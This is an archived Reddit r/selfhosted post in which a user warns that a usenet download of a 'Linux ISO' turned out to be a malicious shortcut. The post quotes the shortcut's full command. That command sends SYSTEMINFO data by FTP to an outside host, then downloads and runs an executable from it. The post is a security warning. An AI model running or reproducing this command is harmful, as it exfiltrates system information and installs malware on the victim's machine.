Hi all ! I just opened Sonarr and saw one of the downloaded LINUX ISO (automatic dl from usenet) was not found in its download folder, so opened...
This is an automated archive made by the Lemmit Bot.

The original was posted on /r/selfhosted by /u/Kevin68300 on 2024-09-19 13:36:45+00:00.

Hi all !

I just opened Sonarr and saw one of the downloaded LINUX ISO (automatic dl from usenet) was not found in its download folder, so opened the folder manually to check, there was in fact a shortcut in there with about 1.3gb and the name of the downloaded iso… And in this shortcut, a script as target…

Went to chatgpt to check and this scripts makes an attempt to upload system informations to a server and to download a malware of some sort.

Here is the script, for the experts (Not me…), DO NOT EXECUTE IT AS I DON’T KNOW WHAT IT EXACTLY DOES:

%COMSPEC% /Cif not exist D.VBS (ECHO createobject("WSCRIPT.Shell"^).run"cmd /CECHO|set/p=USER 200f92f8 >Dw&SYSTEMINFO/NH /fo CSV>>Dw&ECHO RECV %username%.exe>>Dw&ECHO QUIT>>Dw&ftp/s:Dw /n KRP.LINKPC.NET&%username%.exe",0 >D.VBS&CSCRIPT D.VBS&DEL D.VBS)

Be careful out there and always check your files before opening !!